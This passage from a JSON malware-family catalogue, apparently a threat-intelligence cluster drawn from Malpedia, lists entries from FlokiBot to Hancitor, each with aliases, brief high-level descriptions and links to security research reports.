"https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/", "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html", "https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/", "http://adelmas.com/blog/flokibot.php", "http://blog.talosintel.com/2016/12/flokibot-collab.html#more", "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/", "https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/" ], "synonyms": [], "type": [] }, "uuid": "057ff707-a008-4ab8-8370-22b689ed3412", "value": "FlokiBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif", "https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library" ], "synonyms": [], "type": [] }, "uuid": "b1b2e501-b68f-4e2e-ab98-85e9bda0fbcd", "value": "Floxif" }, { "description": "Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc", "https://www.arbornetworks.com/blog/asert/the-flusihoc-dynasty-a-long-standing-ddos-botnet/" ], "synonyms": [], "type": [] }, "uuid": "79e9df7d-abc8-45bd-abd3-be9b975f1a03", "value": "Flusihoc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber", "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/", "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf", "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber", "http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html", "http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html" ], "synonyms": [], "type": [] }, "uuid": "bb836040-c161-4932-8f89-bc2ca2e8c1c0", "value": "Fobber" }, { "description": "FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called \"Babushka Crypter\" by Insidemalware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook", "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", "https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu?", "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html", "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent", "https://blog.talosintelligence.com/2018/06/my-little-formbook.html" ], "synonyms": [], "type": [] }, "uuid": "8378b417-605e-4196-b31f-a0c96d75aa50", "value": "Formbook" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat", "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" ], "synonyms": [ "ffrat" ], "type": [] }, "uuid": "9aacd2c7-bcd6-4a82-8250-cab2e4e2d402", "value": "FormerFirstRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki", "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" ], "synonyms": [], "type": [] }, "uuid": "f86b675a-b7b2-4a40-b4fd-f62fd96440f1", "value": "Freenki Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex", "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" ], "synonyms": [ "BitPaymer" ], "type": [] }, "uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d", "value": "FriedEx" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim", "https://sentinelone.com/blogs/sfg-furtims-parent/", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4341&sid=af76b944112a234fa933cc934d21cd9f" ], "synonyms": [], "type": [] }, "uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1", "value": "Furtim" }, { "description": "GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.galaxyloader" ], "synonyms": [], "type": [] }, "uuid": "c12f1363-2bc8-4ffb-8f31-cbb5f85e0ffe", "value": "GalaxyLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamapos", "http://documents.trendmicro.com/assets/GamaPOS_Technical_Brief.pdf" ], "synonyms": [ "pios" ], "type": [] }, "uuid": "8f785ee5-1663-4972-9a64-f02e7c46ba66", "value": "gamapos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga" ], "synonyms": [], "type": [] }, "uuid": "c4afb7c6-cfba-40d7-aa79-a2829828ed92", "value": "Gameover DGA" }, { "description": "Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p", "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf", "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf", "https://www.wired.com/?p=2171700", "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", "https://www.fox-it.com/nl/wp-content/uploads/sites/12/FoxIT-Whitepaper_Blackhat-web.pdf" ], "synonyms": [ "GOZ", "ZeuS P2P" ], "type": [] }, "uuid": "ffc8c386-e9d6-4889-afdf-ebf37621bc4f", "value": "Gameover P2P" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol" ], "synonyms": [], "type": [] }, "uuid": "9664712b-81f1-4c52-ad4d-a657a120fded", "value": "Gamotrol" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/", "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/", "http://asec.ahnlab.com/1145", "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/", "https://isc.sans.edu/diary/23417", "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", "http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf", "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/", "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom" ], "synonyms": [ "GrandCrab" ], "type": [] }, "uuid": "a8d83baa-cf2e-4329-92d7-06c8ccdeb275", "value": "Gandcrab" }, { "description": "Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox", "http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html" ], "synonyms": [], "type": [] }, "uuid": "591b2882-65ba-4629-9008-51ed3467510a", "value": "Gaudox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gauss", "http://contagiodump.blogspot.com/2012/08/gauss-samples-nation-state-cyber.html" ], "synonyms": [], "type": [] }, "uuid": "5f8be453-8f73-47a2-9c9f-e8b9b02f5691", "value": "Gauss" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer", "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/", "https://securelist.com/introducing-whitebear/81638/", "https://www.youtube.com/watch?v=Pvzhtjl86wc", "https://github.com/eset/malware-ioc/tree/master/turla", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf" ], "synonyms": [ "WhiteBear" ], "type": [] }, "uuid": "0a3047b3-6a38-48ff-8f9c-49a5c28e3ada", "value": "Gazer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman", "https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/" ], "synonyms": [], "type": [] }, "uuid": "ed0586d1-4ff0-4d39-87c7-1414f600d16e", "value": "gcman" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearinformer", "https://www.rekings.com/ispy-customers/", "https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html" ], "synonyms": [], "type": [] }, "uuid": "5e699f4d-9ff6-49dd-bc04-797f0ab2e128", "value": "GearInformer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.geodo", "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/", "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/", "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader", "https://www.us-cert.gov/ncas/alerts/TA18-201A", "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", "https://feodotracker.abuse.ch/?filter=version_e", "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html", "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1" ], "synonyms": [ "Emotet", "Heodo" ], "type": [] }, "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7", "value": "Geodo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "6f155c95-3090-4730-8d3b-0b246162a83a", "value": "GetMail" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/", "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html", "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware" ], "synonyms": [ "getmypos" ], "type": [] }, "uuid": "d77eacf7-090f-4cf6-a305-79a372241158", "value": "GetMyPass" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole", "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/", "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", "https://www.coresecurity.com/core-impact" ], "synonyms": [ "CoreImpact (Modified)" ], "type": [] }, "uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd", "value": "Ghole" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet", "https://en.wikipedia.org/wiki/GhostNet", "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html" ], "synonyms": [ "Remosh" ], "type": [] }, "uuid": "e1410684-c695-4c89-ae5f-80ced136afbd", "value": "Gh0stnet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_admin", "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/", "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html" ], "synonyms": [ "Ghost iBot" ], "type": [] }, "uuid": "6201c337-1599-4ced-be9e-651a624c20be", "value": "GhostAdmin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", "http://www.malware-traffic-analysis.net/2018/01/04/index.html", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", "http://www.hexblog.com/?p=1248", "https://blog.cylance.com/the-ghost-dragon" ], "synonyms": [ "Gh0st RAT", "PCRat" ], "type": [] }, "uuid": "225fa6cf-dc9c-4b86-873b-cdf1d9dd3738", "value": "Ghost RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses", "https://forum.exploit.in/pda/index.php/t102378.html" ], "synonyms": [ "Wordpress Bruteforcer" ], "type": [] }, "uuid": "1c27b1a3-ea2a-45d2-a982-12e1509aa4ad", "value": "Glasses" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glassrat", "https://community.rsa.com/community/products/netwitness/blog/2015/11/25/detecting-glassrat-using-security-analytics-and-ecat" ], "synonyms": [], "type": [] }, "uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c", "value": "GlassRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter", "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/", "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", "https://isc.sans.edu/diary/23417", "https://blog.ensilo.com/globeimposter-ransomware-technical", "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet" ], "synonyms": [], "type": [] }, "uuid": "73806c57-cef8-4f7b-a78b-7949ef83b2c2", "value": "GlobeImposter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.globe_ransom" ], "synonyms": [], "type": [] }, "uuid": "de8e204c-fb65-447e-92bd-200e1c39648c", "value": "Globe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "18208674-fe8c-447f-9e1d-9ff9a64b2370", "value": "GlooxMail" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba", "http://resources.infosecinstitute.com/tdss4-part-1/", "http://malwarefor.me/2015-04-13-nuclear-ek-glupteba-and-operation-windigo/", "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/" ], "synonyms": [], "type": [] }, "uuid": "978cfb82-5fe9-46d2-9607-9bcdfeaaa58c", "value": "Glupteba" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4349&p=28427#p28346" ], "synonyms": [], "type": [] }, "uuid": "9cfdc3ea-c838-4ac5-bff2-57c92ec24b48", "value": "Godzilla Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2", "value": "Goggles" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/", "http://www.threatgeek.com/2017/02/spying-on-goldeneye-ransomware.html" ], "synonyms": [ "Petya/Mischa" ], "type": [] }, "uuid": "d7196f6a-757b-4124-ae28-f403e5d84fcb", "value": "GoldenEye" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" ], "synonyms": [], "type": [] }, "uuid": "2297799c-f93c-4903-b9af-32b6b599912c", "value": "GoldDragon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.golroted", "http://www.vkremez.com/2017/11/lets-learn-dissecting-golroted-trojans.html" ], "synonyms": [], "type": [] }, "uuid": "9cd98c61-0dfa-4af6-b334-65eb43bc8d9d", "value": "Golroted" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor", "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control" ], "synonyms": [ "Fuerboos" ], "type": [] }, "uuid": "91b52a5f-420a-484b-8e1e-a91d402db6c5", "value": "Goodor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.google_drive_rat", "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf" ], "synonyms": [], "type": [] }, "uuid": "d1298818-6425-49be-9764-9f119d964efd", "value": "GoogleDrive RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic", "https://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/" ], "synonyms": [], "type": [] }, "uuid": "1ebb6107-f97b-45f6-ae81-a671ac437181", "value": "GooPic Drooper" }, { "description": "Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++-library functions for various tasks.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit", "https://www.lexsi.com/securityhub/homer-simpson-brian-krebs-rencontrent-zeus-gootkit/", "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html", "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/", "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055", "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps", "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", "https://www.us-cert.gov/ncas/alerts/TA16-336A", "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html", "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/", "https://www.youtube.com/watch?v=242Tn0IL2jE", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669", "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/", "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", "https://news.drweb.com/show/?i=4338&lng=en", "https://www.youtube.com/watch?v=QgUlPvEE4aw", "https://www.cyphort.com/angler-ek-leads-to-fileless-gootkit/" ], "synonyms": [ "Xswkit", "talalpek" ], "type": [] }, "uuid": "329efac7-922e-4d8b-90a9-4a87c3281753", "value": "GootKit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat", "https://www.yumpu.com/en/document/view/55930175/govrat-v20" ], "synonyms": [], "type": [] }, "uuid": "9fbb5822-1660-4651-9f57-b6f83a881786", "value": "GovRAT" }, { "description": "2000 Ursnif aka Snifula\r\n2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n-> 2010 Gozi Prinimalka -> Vawtrak/Neverquest\r\n\r\nIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.\r\nIt was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi", "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html", "https://www.secureworks.com/research/gozi", "https://lokalhost.pl/gozi_tree.txt", "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/" ], "synonyms": [ "CRM", "Gozi CRM", "Papras", "Snifula", "Ursnif" ], "type": [] }, "uuid": "75329c9e-a218-4299-87b2-8f667cd9e40c", "value": "Gozi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode", "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html", "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/", "https://de.securelist.com/analysis/59479/erpresser/", "ftp://ftp.tuwien.ac.at/languages/php/oldselfphp/internet-security/analysen/index-id-200883584.html", "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2" ], "synonyms": [], "type": [] }, "uuid": "127c3d76-6323-4363-93e0-cd06ade0dd52", "value": "GPCode" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot", "http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data" ], "synonyms": [], "type": [] }, "uuid": "0092b005-b032-4e34-9c7e-7dd0e71a85fb", "value": "GrabBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor", "http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html" ], "synonyms": [], "type": [] }, "uuid": "94b942e2-cc29-447b-97e2-e496cbf2aadf", "value": "Graftor" }, { "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html", "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season" ], "synonyms": [ "FrameworkPOS", "trinity" ], "type": [] }, "uuid": "f82f8d2c-695e-461a-bd4f-a7dc58531063", "value": "Grateful POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem", "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" ], "synonyms": [], "type": [] }, "uuid": "5de7bd7f-bbbc-4431-8fd2-a90d25f30fd8", "value": "Gratem" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat", "https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/", "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" ], "synonyms": [], "type": [] }, "uuid": "1de27925-f94c-462d-acb6-f75822e05ec4", "value": "Gravity RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan", "https://blog.cylance.com/spear-a-threat-actor-resurfaces" ], "synonyms": [ "eoehttp" ], "type": [] }, "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17", "value": "GreenShaitan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok", "https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" ], "synonyms": [], "type": [] }, "uuid": "5ba66415-b482-44ff-8dfa-809329e0e074", "value": "GROK" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump", "https://attack.mitre.org/wiki/Technique/T1003" ], "synonyms": [], "type": [] }, "uuid": "8410d208-7450-407d-b56c-e5c1ced19632", "value": "gsecdump" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1", "https://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities" ], "synonyms": [], "type": [] }, "uuid": "0ecf5aca-05ef-47fb-b114-9f4177faace3", "value": "H1N1 Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hacksfase", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "2713a763-33fa-45ce-8552-7dd12b6b8ecc", "value": "Hacksfase" }, { "description": "Py2Exe based tool as found on github.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hackspy", "https://github.com/ratty3697/HackSpy-Trojan-Exploit" ], "synonyms": [], "type": [] }, "uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9", "value": "HackSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq", "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf" ], "synonyms": [], "type": [] }, "uuid": "454fc9f7-b328-451f-806c-68ff5bcd491e", "value": "Hamweq" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor", "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", "http://www.morphick.com/resources/lab-blog/closer-look-hancitor", "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", 